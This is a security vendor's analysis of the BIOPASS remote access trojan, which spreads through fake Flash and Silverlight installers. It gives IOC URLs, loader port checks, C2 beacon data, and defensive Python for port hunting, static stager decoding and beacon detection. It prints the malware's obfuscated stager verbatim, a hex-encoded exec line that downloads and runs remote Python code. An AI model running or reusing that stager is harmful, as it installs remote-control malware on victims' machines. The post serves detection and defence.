SecneurX has been observing a RAT (Remote Access Trojan) that targets users of Windows systems through a watering hole attack. This RAT is now referred to as BIOPASS RAT.
The details shared in this blog come from artifacts acquired in the wild using the SecneurX Acquisition Engine. SecneurX analysed these artifacts on the SecneurX Advanced Dynamic Malware Analysis Platform and generated IOCs (Indicators of Compromise), a behavioural analysis report of the malware and threat signatures that can be consumed by SOC and security analysts.
Victims are tricked into downloading a malware loader disguised as a legitimate installer such as Adobe Flash Player or Microsoft Silverlight. The loader sets up a backdoor through which the Command & Control (C2) server controls the victim's system. It then downloads a toolkit containing tools to capture screenshots, stream desktop content, steal credentials and so on, and waits for the C2 to issue commands. It also establishes a socket connection to the C2, which runs on public cloud infrastructure, to exfiltrate data.
This malware has the potential to cause serious data exfiltration. Watch your logs for the IOCs listed at the end of this blog. A detailed analysis of the behaviour of BIOPASS RAT, with network and process information, follows for interested readers. Preventive steps can be taken based on the IOCs and the behavioural report attached to this blog.
The threat scenario is analysed step by step below.
Victims are tricked into downloading malicious installers posing as Flash or Silverlight when they visit compromised websites.
During installation, the malware downloads the genuine Flash or Silverlight installer from its own hosting (a decoy that keeps the installation looking legitimate), for example from this URL:
hxxp://softres[.]oss-accelerate[.]aliyuncs[.]com/Silverlight[.]exe
The malware then downloads a Python script from the C2; note that it is served with a .lua extension:
hxxp://lualibs[.]oss-cn-hongkong[.]aliyuncs[.]com/x86/1-CS-443[.]lua
This Python script checks whether the machine is already compromised by testing for listeners on specific ports: 43990, 43992, 53990, 33990, 33890, 48990, 12880, 22880, 32880, 42880, 52880, 62880.
If the machine is not already compromised, it downloads the subsequent payloads:
hxxp://lualibs[.]oss-cn-hongkong[.]aliyuncs[.]com/x86/Schedule[.]lua
hxxp://lualibs[.]oss-accelerate[.]aliyuncs[.]com/x86/ScheduleTask[.]dll
hxxp://softres[.]oss-accelerate[.]aliyuncs[.]com/ShellExperienceHost[.]zip
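The listener check doubles as a host-level hunt: whatever the loader uses to decide "already infected", a defender can look for the same thing. The following is an added example, not code from this blog or from the malware, that reproduces the loader's decision using the port list above. The blog does not say how the script detects listeners, so a loopback TCP connect is an assumption made here; the `probe` parameter is a hypothetical hook that lets the decision logic run without a live listener.

```python
import socket

# Ports the loader script probes for an existing BIOPASS listener, copied from
# the analysis above. A listener on any of them makes the loader treat the host
# as already compromised and skip the next stage.
BIOPASS_MARKER_PORTS = (
    43990, 43992, 53990, 33990, 33890, 48990,
    12880, 22880, 32880, 42880, 52880, 62880,
)


def tcp_listener_open(port, host="127.0.0.1", timeout=0.5):
    """Return True when something accepts a TCP connection on host:port.

    Assumption: the blog does not say how the script detects listeners, so a
    loopback connect is used here because it needs no privileges and works on
    any Windows or Linux host.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        return sock.connect_ex((host, port)) == 0


def find_marker_listeners(ports=BIOPASS_MARKER_PORTS, probe=tcp_listener_open):
    """Return the ports from `ports` that currently have a listener.

    `probe(port) -> bool` is injectable so the decision logic can be exercised
    offline; the default probes loopback for real.
    """
    return [port for port in ports if probe(port)]


def loader_would_skip(ports=BIOPASS_MARKER_PORTS, probe=tcp_listener_open):
    """Mirror the loader's decision: any listener means 'already compromised'."""
    return bool(find_marker_listeners(ports, probe))


def hunt_report(ports=BIOPASS_MARKER_PORTS, probe=tcp_listener_open):
    """Defender's view of the same check, as a one-line verdict for a host."""
    hits = find_marker_listeners(ports, probe)
    if not hits:
        return "no BIOPASS marker ports listening"
    return "BIOPASS marker port(s) listening: " + ", ".join(str(p) for p in hits)


if __name__ == "__main__":
    # Run on a host under investigation; exit status 1 on a hit so the script
    # can be fanned out across a fleet and the hits collected.
    print(hunt_report())
    raise SystemExit(1 if loader_would_skip() else 0)
```

A hit on one of these ports is a strong lead, not proof: any unrelated service bound to the same number produces the same answer, so confirm with the scheduled task and file IOCs described further down before declaring a host compromised.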
The final payload was obfuscated as shown below. Decoding it reveals the URL of the BIOPASS RAT payload.
Obfuscated payload
"exec(b''.fromhex('696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d616363656c65726174652e616c6979756e63732e636f6d2f72322f626967322e70792729292e7265616428292e6465636f6465282929').decode())"
BIOPASS RAT URL after decoding
hxxp://flashdownloadserver[.]oss-accelerate[.]aliyuncs[.]com/r2/big2[.]py
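The stager above is a single `exec(b''.fromhex('...').decode())` wrapper, so the next stage URL can be recovered without running anything. The following is an added example, not code from this blog or from the malware; it decodes that layer statically, goes a step further than the sample by peeling repeated layers of the same trick, and writes the recovered URL in the defanged form used for the IOCs in this post. `peel_layers` and `defang` are helper names chosen here.

```python
import re
from urllib.parse import urlsplit

# The obfuscated stager from the analysis above, copied verbatim.
STAGER = "exec(b''.fromhex('696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d616363656c65726174652e616c6979756e63732e636f6d2f72322f626967322e70792729292e7265616428292e6465636f6465282929').decode())"

_FROMHEX_RE = re.compile(r"fromhex\(\s*['\"]([0-9a-fA-F]+)['\"]\s*\)")
_URL_RE = re.compile(r"https?://[^\s'\"()]+")


def extract_hex_literals(source):
    """Return every hex literal handed to bytes.fromhex() in `source`."""
    return _FROMHEX_RE.findall(source)


def decode_stager(source):
    """Statically decode one exec(b''.fromhex('...')) layer.

    Returns the Python that exec() would have run, or None when the pattern
    is absent. Nothing is executed.
    """
    literals = extract_hex_literals(source)
    if not literals:
        return None
    return bytes.fromhex(literals[0]).decode("utf-8", errors="replace")


def peel_layers(source, max_layers=5):
    """Repeat decode_stager while each result is itself another such layer.

    Returns all layers, outermost first; the last element is the innermost
    plaintext. `max_layers` bounds the loop for samples that nest deeply.
    """
    layers = [source]
    for _ in range(max_layers):
        inner = decode_stager(layers[-1])
        if inner is None:
            break
        layers.append(inner)
    return layers


def extract_urls(text):
    """Pull http(s) URLs out of decoded text for IOC hand-off."""
    return _URL_RE.findall(text)


def defang(url):
    """Write a URL the way the IOCs in this post are written (hxxp, [.])."""
    parts = urlsplit(url)
    scheme = {"http": "hxxp", "https": "hxxps"}.get(parts.scheme, parts.scheme)
    rest = (parts.netloc + parts.path).replace(".", "[.]")
    if parts.query:
        rest += "?" + parts.query
    return f"{scheme}://{rest}"


if __name__ == "__main__":
    layers = peel_layers(STAGER)
    for depth, layer in enumerate(layers):
        print(f"layer {depth}: {layer[:80]}")
    for url in extract_urls(layers[-1]):
        print("IOC:", defang(url))
```

The decoded layer is a one-line downloader (urllib fetching the next stage and exec-ing it), so the URL is the only artifact worth keeping from it; the same regex approach does nothing for samples that build the hex string at runtime, which is where a sandbox run is still needed.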
The payload downloaded in the earlier step includes a toolkit, fetched from the URL below.
hxxp://softres[.]oss-accelerate[.]aliyuncs[.]com/ShellExperienceHost[.]zip
The contents of the toolkit are shown in the image below. The toolkit contains a Python environment and its dependencies.

The BIOPASS RAT script itself is downloaded from the URL below.
hxxp://flashdownloadserver[.]oss-accelerate[.]aliyuncs[.]com/r2/big2[.]py
To start the downloaded binaries periodically, an entry is created in the Task Scheduler.

The BIOPASS script implements the following tasks, which the C2 can instruct it to execute:
The malware can also deploy a Cobalt Strike payload from the URL below, which is obfuscated in the code.
hxxp://flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/c1222[.]txt
Payload:

Communication between the infected host and the C2 is base85 encoded, compressed and AES encrypted. The captured message below is a Socket.IO "join" event (the leading 42 is the Engine.IO message / Socket.IO event prefix); its data field carries the encoded payload.
Encrypted data:
42["join",{"type":"client","data":"c$@*?03ZJ>jH4D#UVpo?^o7<}6%{}fj4Jv$ey?7woLCG3L!Pm^m)lSCttTFO7D$5<X6BZHa1nx)c>OG(KaGrvxrSQd(1I1tfz!&K08>;NY1S_`J<a&pbp*w^~_m80=BEu9&gKLyp*oYc7nk>4S(7+9BCV_an;BR4a`Ws|@yGxqYJdJ3>FixK5Q)ix8W@b~cnwK4K`D$#%B0div=dos=htppsbZx4Qh=@QEkVEVI72G7t>wy@u~0{zd#NJPIskliVsu=np$e^v5e1pSn)8T-{UJJW|MCWob("}]
Decrypted data:
{"do": "k", "ips": "192.168.17.132", "public_ip": "157.49.4.95", "osv": "Windows 7 x64", "cuser": "win-l842sfcie1t\\administrator", "pid": 2760, "key": "null", "uid": "1", "av": "N/A", "city": " \u70\ua6"}
The C2 issues commands such as grabbing a screenshot, fetching browser history or streaming the desktop; the malware executes them and exfiltrates the resulting data.
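Without the AES key, the data field cannot be read, but the beacon still has a recognisable shape on the wire: a Socket.IO "join" event carrying {"type":"client","data":<base85>}. The following is an added example, not code from this blog or from the malware, that parses the Socket.IO frame, matches that shape, and maps a decrypted record with the field names shown above to alert fields. The base85 alphabet is the one used by Python's base64.b85encode (the captured data contains ~, ` and |, which exist in that alphabet and not in Z85); the decrypted sample record is constructed for the demonstration, with made-up values.

```python
import json
import re
import string

# Alphabet of Python's base64.b85encode. The captured "data" field below uses
# characters such as '~', '`' and '|' that are in this alphabet but not in
# the Z85 variant, so that is the alphabet this check is written against.
B85_ALPHABET = frozenset(
    string.digits + string.ascii_uppercase + string.ascii_lowercase
    + "!#$%&()*+-;<=>?@^_`{|}~"
)

# Socket.IO text frame: <engine.io type><socket.io type>[/namespace,][ack id]<json>
# "42" is Engine.IO MESSAGE (4) carrying a Socket.IO EVENT (2).
_FRAME_RE = re.compile(
    r"^(?P<eio>\d)(?P<sio>\d)(?P<nsp>/[^,]*,)?(?P<ack>\d+)?(?P<body>\[.*\])$",
    re.S,
)

# The beacon frame from the analysis above, copied verbatim.
CAPTURED_FRAME = '42["join",{"type":"client","data":"c$@*?03ZJ>jH4D#UVpo?^o7<}6%{}fj4Jv$ey?7woLCG3L!Pm^m)lSCttTFO7D$5<X6BZHa1nx)c>OG(KaGrvxrSQd(1I1tfz!&K08>;NY1S_`J<a&pbp*w^~_m80=BEu9&gKLyp*oYc7nk>4S(7+9BCV_an;BR4a`Ws|@yGxqYJdJ3>FixK5Q)ix8W@b~cnwK4K`D$#%B0div=dos=htppsbZx4Qh=@QEkVEVI72G7t>wy@u~0{zd#NJPIskliVsu=np$e^v5e1pSn)8T-{UJJW|MCWob("}]'

# A constructed record with the same field names as the decrypted beacon
# shown above; the values are made up for the demonstration, not captured.
SAMPLE_DECRYPTED = json.dumps({
    "do": "k", "ips": "10.0.0.5", "public_ip": "203.0.113.7",
    "osv": "Windows 10 x64", "cuser": "host01\\alice", "pid": 4242,
    "key": "null", "uid": "1", "av": "N/A", "city": "N/A",
})


def parse_socketio_event(frame):
    """Split a Socket.IO text frame into (event_name, args); None if not an event."""
    m = _FRAME_RE.match(frame)
    if not m or m.group("eio") != "4" or m.group("sio") != "2":
        return None
    try:
        body = json.loads(m.group("body"))
    except json.JSONDecodeError:
        return None
    if not isinstance(body, list) or not body or not isinstance(body[0], str):
        return None
    return body[0], body[1:]


def is_b85_text(text):
    """True when `text` is non-empty and drawn entirely from the b85 alphabet."""
    return bool(text) and all(ch in B85_ALPHABET for ch in text)


def classify_frame(frame):
    """Return an alert record when `frame` has the BIOPASS beacon shape, else None.

    Shape: Socket.IO "join" event whose argument is {"type":"client","data":<b85>}.
    The content cannot be read without the AES key, so this matches on shape only.
    """
    parsed = parse_socketio_event(frame)
    if parsed is None:
        return None
    event, args = parsed
    if event != "join" or not args or not isinstance(args[0], dict):
        return None
    arg = args[0]
    data = arg.get("data")
    if arg.get("type") != "client" or not isinstance(data, str) or not is_b85_text(data):
        return None
    return {"event": event, "client_type": arg["type"], "encoded_len": len(data)}


def beacon_to_alert(decrypted_json):
    """Map a decrypted beacon (field names as in the analysis above) to alert fields."""
    b = json.loads(decrypted_json)
    return {
        "action": b.get("do"),
        "internal_ip": b.get("ips"),
        "public_ip": b.get("public_ip"),
        "os": b.get("osv"),
        "user": b.get("cuser"),
        "pid": b.get("pid"),
    }


if __name__ == "__main__":
    print(classify_frame(CAPTURED_FRAME))
    print(beacon_to_alert(SAMPLE_DECRYPTED))
```

Shape matching is what a network sensor can do on this traffic; unwrapping the payload means undoing the layers in the reverse of the order they were applied, and the AES key needed for that step is not part of this post. A generic Socket.IO client on a corporate host is not rare, so pair this match with the cloud-storage destinations in the IOC list rather than alerting on it alone.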
Indicators of Compromise
Conclusion
Given the nature of the malware, we advise users to be careful about the applications they download. Organisations can take preventive steps based on the IOCs and the behavioural report attached to this blog.